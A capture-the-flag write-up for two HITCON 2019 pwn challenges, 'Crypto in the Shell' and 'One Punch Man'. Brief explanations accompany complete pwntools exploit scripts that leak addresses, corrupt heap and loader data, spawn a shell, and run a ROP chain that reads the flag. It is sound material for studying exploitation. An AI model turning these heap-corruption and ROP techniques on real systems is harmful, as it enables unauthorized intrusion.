HITCON CTF 2019 Pwn Write-up
Crypto in the Shell
The vulnerability is easy: the encryption causes an out-of-bounds access. We can encrypt a piece of memory at an arbitrary offset, and the result of the encryption is printed. Here are the steps to exploit it:
- Encrypt the key; the result of the encryption is shown, and it is the new key.
- Encrypt at offset `-0x3a0` and decrypt the result to leak the program address.
- Similarly, encrypt at offset `-0x40` to leak the `libc` address, since it stores `stderr`. Note that we cannot use `stdout` or `stdin` to leak the `libc` address, since they are being used by the program and changing their contents would cause a crash.
- Use `libc_addr+0x3f04c0` to leak a stack address; then we can rewrite the loop variable `i` to bypass the limit on the number of encryptions. However, due to ASLR, we only have a `1/2` probability of making `i` negative.
- Brute-force byte-by-byte to rewrite `ld_addr+0x228968` to `"sh"` and `ld_addr+0x228f60` to `&system`. Due to the remote timeout, we need to pre-calculate the number of encryptions needed to obtain a certain byte and send the payloads all together.
- `exit` to get the shell.
from pwn import *
from random import *
from time import time
from hashlib import *
from Crypto.Cipher import AES
from binascii import *
# Global configuration for the "Crypto in the Shell" exploit.
AES_BLOCK_SIZE = 16
g_local = 1  # non-zero: attack a local process under gdb; zero: attack the remote service
context(log_level='debug', arch='amd64')
e = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
if not g_local:
    sh = remote("3.113.219.89", 31337)
else:
    sh = process("./chall")
    gdb.attach(sh)
def enc(off, size=0xf):
    """Send an offset/size pair to the service and return what it prints back.

    Both numbers are reduced to unsigned 64-bit before being sent in decimal,
    so a negative offset goes out as its two's-complement value.  The returned
    string is everything received before the next "offset:" prompt, and its
    length is asserted to be a multiple of 0x10.
    """
    mask = 0xffffffffffffffff
    prompt = "offset:"
    sh.sendline(str(off & mask))
    sh.sendlineafter("size:", str(size & mask))
    reply = sh.recvuntil(prompt)
    ciphertext = reply[:-len(prompt)]
    assert len(ciphertext) % 0x10 == 0
    return ciphertext
# Per the write-up, encrypting the key itself (offset -0x20) prints the new
# key, so the value returned here is the key used by dec()/enc2() below.
key = enc(-0x20)
# The local AES helpers use an all-zero 16-byte IV.
iv = '\x00' * 0x10
def dec(data):
    """Decrypt `data` locally with AES-CBC under the global `key` and `iv`."""
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return cipher.decrypt(data)
def enc2(data):
    """Encrypt `data` locally with AES-CBC under the global `key` and `iv`.

    Used to predict what one remote encryption round does to known memory.
    """
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return cipher.encrypt(data)
prog_addr = dec(enc(-0x3a0))
prog_addr = u64(prog_addr[8:]) - 0x202008
print hex(prog_addr)
libc_addr = dec(enc(-0x40))
libc_addr = u64(libc_addr[:8]) - e.symbols["_IO_2_1_stderr_"]
print hex(libc_addr)
def calc_off(addr):
    """Convert absolute address `addr` into an offset from prog_addr + 0x2023a0.

    The result is what gets sent to the service as the "offset" value.
    """
    base = prog_addr + 0x2023a0
    return addr - base
env_off = calc_off(libc_addr+0x3f04c0)
stack_addr = dec(enc(env_off))
stack_addr = u64(stack_addr[:8]) + 0x10 - 0x120
print hex(stack_addr)
# 0.5, need to make i negative
enc(calc_off(stack_addr))
# previous bytes might be affected
def write_byte(addr, val, data):
    """Force the byte at `addr` to `val` by repeatedly encrypting the window ending there.

    `data` must be the expected current content of the 16-byte window
    [addr-0xf, addr].  The encryption is first simulated locally with enc2()
    to count how many rounds make the last byte equal `val`; that many
    requests are then sent before any reply is read.

    Returns the simulated window content after the final round.
    """
    assert len(data) == 0x10
    off = calc_off(addr - 0xf)

    # At least one round is always performed, matching a do-while loop.
    data = enc2(data)
    rounds = 1
    while u8(data[0xf]) != val:
        data = enc2(data)
        rounds += 1

    request = str(off) + '\n15\n'
    for _ in xrange(rounds):
        sh.send(request)
    for _ in xrange(rounds):
        sh.recvuntil("offset:")
    return data
# Base for the two `ld_addr + ...` write targets used below.
# NOTE(review): presumably the dynamic loader's base, assumed to sit 0x3f1000
# bytes after the libc base -- confirm against the target's memory map.
ld_addr = libc_addr + 0x3f1000
def write_bytes(addr, s, data):
    """Write the string `s` to `addr`, one byte at a time, last byte first.

    `data` is the expected current memory from addr-0x10 up to the end of the
    target region (0x10 + len(s) bytes).  Each write_byte() call rewrites the
    16-byte window ending at the byte being set, so the local copy of that
    window is replaced with the value write_byte() returns.  Going from the
    last byte to the first keeps already-written bytes out of later windows.
    """
    assert len(data) == 0x10 + len(s)
    for idx in reversed(range(len(s))):
        lo = idx + 1
        hi = idx + 0x11
        window = write_byte(addr + idx, u8(s[idx]), data[lo:hi])
        data = data[:lo] + window + data[hi:]
# print hex(u64(dec(enc(calc_off(ld_addr + 0x228f50)))[:8]))
# sh.interactive()

# Write "sh" at ld_addr+0x228968.  od1 is the expected content of the 16 bytes
# before the target, followed by the two bytes currently at the target.
od1 = p64(0) + p64(1)
write_bytes(ld_addr + 0x228968, "sh", od1 + 2*'\x00')

# Overwrite the low 3 bytes of the pointer at ld_addr+0x228f60 with those of
# system(); the pointer's current low 3 bytes are taken from ld_addr+0x10e0.
od2 = p64(0) + p64(0)
write_bytes(
    ld_addr + 0x228f60,
    p64(libc_addr + e.symbols["system"])[:3],
    od2 + p64(ld_addr + 0x10e0)[:3],
)
# local 0x440->0x441
# remote 0x440->0x496
# print hex(libc_addr + e.symbols["system"])
# print hex(u64(dec(enc(calc_off(ld_addr + 0x228f60)))[:8]))
# print hex(u64(dec(enc(calc_off(ld_addr + 0x228968)))[:8]))
sh.interactive()
One Punch Man
The vulnerability is a simple UAF, and the relevant leaks are very easy, but normal allocation can only use `calloc`, which does not use `tcache`, and the allowed sizes rule out `fastbin` chunks as well as `unsorted bin` chunks that would not be inserted into `tcache`. The hidden function allows `malloc(0x217)`, but only when the `0x220` `tcache` count is larger than 6, so we cannot simply write `fd` to achieve an arbitrary write.
Initially we tried an `unsorted bin attack`, but it seems that we must use a chunk that will not be put into `tcache` to do an `unsorted bin attack`. Then I tried `house of lore` to allocate a chunk at the `tcache arena`; however, the program crashes in the `memset` function, since the size passed into `memset` is too large. The root cause is that `calloc` uses `chunk_size-0x10` as the argument of `memset`, and `chunk_size` can only be `0` or a heap address, which always gives a size that is way too large.
The solution is to use `unlink` first to rewrite the `0x220 tcache pointer` to `&pointer - 0x18`, so that we can allocate a chunk at the `tcache arena` and fake a `0x10` chunk size there first. We then use the `house of lore` attack again, and this time the size passed into `memset` is `0x10-0x10=0`, which does not cause any crash.
Then it is easy to rewrite the `0x220 tcache pointer` while still keeping the `tcache count` at 7; by allocating with `malloc(0x217)` we can achieve an arbitrary memory write. We can overwrite `__malloc_hook` and perform ROP, since the stack contents are controllable.
from pwn import *
# Global configuration for the "One Punch Man" exploit.
AES_BLOCK_SIZE = 16
g_local = 0  # non-zero: attack a local process under gdb; zero: attack the remote service
context(log_level='debug', arch='amd64')
e = ELF("./libc.so.6")
if not g_local:
    sh = remote("52.198.120.1", 48763)
else:
    sh = process("./one_punch", env={"LD_LIBRARY_PATH": "."})
    gdb.attach(sh)
def ce(cmd, idx, name):
    """Shared driver for the menu entries that take an index and a name.

    Sends the NUL-terminated menu choice `cmd`, answers the "idx: " prompt
    with the NUL-terminated decimal `idx`, answers the "name: " prompt with
    `name` as-is, then waits for the next "> " prompt.
    """
    menu_choice = cmd + '\x00'
    index_reply = str(idx) + '\x00'
    sh.send(menu_choice)
    sh.sendafter("idx: ", index_reply)
    sh.sendafter("name: ", name)
    sh.recvuntil("> ")
def create(idx, name):
    """Menu choice '1': submit `name` for slot `idx` via ce()."""
    return ce('1', idx, name)


def edit(idx, name):
    """Menu choice '2': submit `name` for slot `idx` via ce()."""
    return ce('2', idx, name)
def show(idx):
    """Menu choice '3': return the name printed for slot `idx`.

    The returned string is what the service prints between "name: " and the
    "\n####" that follows it.
    """
    terminator = "\n####"
    sh.send('3\x00')
    sh.sendafter("idx: ", str(idx) + '\x00')
    sh.recvuntil("name: ")
    printed = sh.recvuntil(terminator)
    content = printed[:-len(terminator)]
    sh.recvuntil("> ")
    return content
def delete(idx):
    """Menu choice '4': delete slot `idx`; return everything read up to the next "> " prompt."""
    index_reply = str(idx) + '\x00'
    sh.send('4\x00')
    sh.sendafter("idx: ", index_reply)
    output = sh.recvuntil("> ")
    return output
def punch(data="a"):
    """Invoke the hidden menu entry 50056 and send `data` to it.

    The menu choice is NUL-padded to 8 bytes; the function then waits for the
    next "> " prompt.
    """
    choice = "50056"
    padded_choice = choice + '\x00' * (8 - len(choice))
    sh.send(padded_choice)
    sh.send(data)
    sh.recvuntil("> ")
# --- Exploit driver --------------------------------------------------------
# The statements below shape the heap step by step; their order is significant.

# Heap leak: free two 0x217-byte entries, then read entry 1 back through the
# UAF.  show() is expected to return 6 bytes, padded here to 8 for u64().
create(0, '0' * 0x217)
create(1, '1' * 0x217)
delete(0)
delete(1)
heap_addr = u64(show(1) + '\x00\x00') - 0x260
# Five more create/delete rounds of the same size
# (presumably to bring the 0x220 tcache count to 7 -- TODO confirm).
for i in xrange(5):
    create(0, '2' * 0x217)
    delete(0)
# Libc leak: free entry 0 again and read it back through the UAF.
create(0, '2' * 0x217)
create(1, '3' * 0x217)
delete(0)
libc_addr = u64(show(0)+'\x00\x00') - 0x1e4ca0
print hex(heap_addr),hex(libc_addr)
delete(1)
punch() # consume 1 tcache
create(0, 'T' * 0x217)
delete(0)
# Zero the first 16 bytes of the freed entry before freeing it a second time.
edit(0, p64(0)*2)
delete(0)
# now top chunk + 0x10 == top elem in 0x220
for i in xrange(3):
    create(i, 'U' * 0x217)
for i in xrange(3):
    delete(i) # all merged to top
# Fake 0x210-sized chunk whose fd/bk are heap_addr+0x150-0x18 and
# heap_addr+0x150-0x10 (the classic unlink layout), followed by the header of
# the next chunk: prev_size 0x210, size 0x600.
fake_chunk = p64(0) + p64(0x211)
fake_chunk += p64(heap_addr + 0x150 - 0x18)
fake_chunk += p64(heap_addr + 0x150 - 0x10)
fake_chunk = fake_chunk.ljust(0x210, 'F')
fake_chunk += p64(0x210) + p64(0x600)
create(0, cyclic(0x400))
edit(0, fake_chunk)
# 0x220 <- 0x200 top
# +0x1e0 <- g[2].ptr
create(2, cyclic(0x400))
# current heap layout:
# 0x400 chunk
# [fake 0x210 chunk + 0x600 chunk head, whose next is top]
# 0x400 chunk
delete(1) # unlink trigger, things merged to top
punch(p64(0x28))
# fake chunk_size for smallbin attack
# otherwise calloc will crash in memset
create(0, '7' * 0x217)
delete(0) # fill 0x220 tcache
# consolidate topchunk
for i in xrange(6):
    create(0, '4' * 0x1f0)
    delete(0)
create(1, 'P' * 0x217) # create a padding
create(0, '4' * 0x1f0) # last tcache chunk
delete(0) # put it to tcache
edit(0, p64(0) + p64(0))
# rewrite fd and key to bypass double free check
delete(0) # to topchunk
delete(1) # to topchunk
# now 0x200 -> 7, top element is behind topchunk
# now 0x220 -> 7
create(0, '5' * 0x220)
create(0, '4' * 0x1f0) # chunk_head == top at 0x200
create(1, '5' * 0x200)
delete(0)
create(1, '5' * 0x200) # put to smallbin
# Overwrite the first two pointers of freed entry 0 with libc_addr+0x1e4e90
# and heap_addr+0x130.
edit(0, p64(libc_addr+0x1e4e90) + p64(heap_addr+0x130))
delete(1)
edit(1, p64(0)*2 + p64(heap_addr+0x130))
create(0, 'C' * 0x1f0)
# This entry's content carries the address of __malloc_hook at offset 0x10.
create(0, 'A' * 0x10 + p64(libc_addr + \
    e.symbols["__malloc_hook"]).ljust(0x1e0, '\x00'))
# add rsp,48; ret
# The gadget address is followed by the string "flag"; the ROP chain below
# passes __malloc_hook + 8 as the path argument, i.e. where that string lands
# if this write starts at __malloc_hook.
punch(p64(libc_addr + 0x8cfd6) + "flag\x00")
# Gadget addresses are offsets into the provided libc.
pop_rdi = p64(libc_addr + 0x26542)
pop_rsi = p64(libc_addr + 0x26f9e)
pop_rdx = p64(libc_addr + 0x12bda6)
pop_rcx = p64(libc_addr + 0x10b31e)
# syscall(2, __malloc_hook + 8, 0): syscall number 2 is open on x86-64 Linux.
rop = pop_rdi + p64(2)
rop += pop_rsi
rop += p64(libc_addr + e.symbols["__malloc_hook"] + 8)
rop += pop_rdx + p64(0)
rop += p64(libc_addr + e.symbols["syscall"])
# read(3, heap_addr + 0x2000, 0x100) -- assumes the opened file gets fd 3.
rop += pop_rdi + p64(3)
rop += pop_rsi + p64(heap_addr + 0x2000)
rop += pop_rdx + p64(0x100)
rop += p64(libc_addr + e.symbols["read"])
# write(1, heap_addr + 0x2000, 0x100): dump the buffer to stdout.
rop += pop_rdi + p64(1)
rop += pop_rsi + p64(heap_addr + 0x2000)
rop += pop_rdx + p64(0x100)
rop += p64(libc_addr + e.symbols["write"])
rop += p64(0)
# The chain is sent as the content of a new entry; the allocation made by this
# create() is what is expected to reach the overwritten hook.
create(0, rop)
sh.interactive()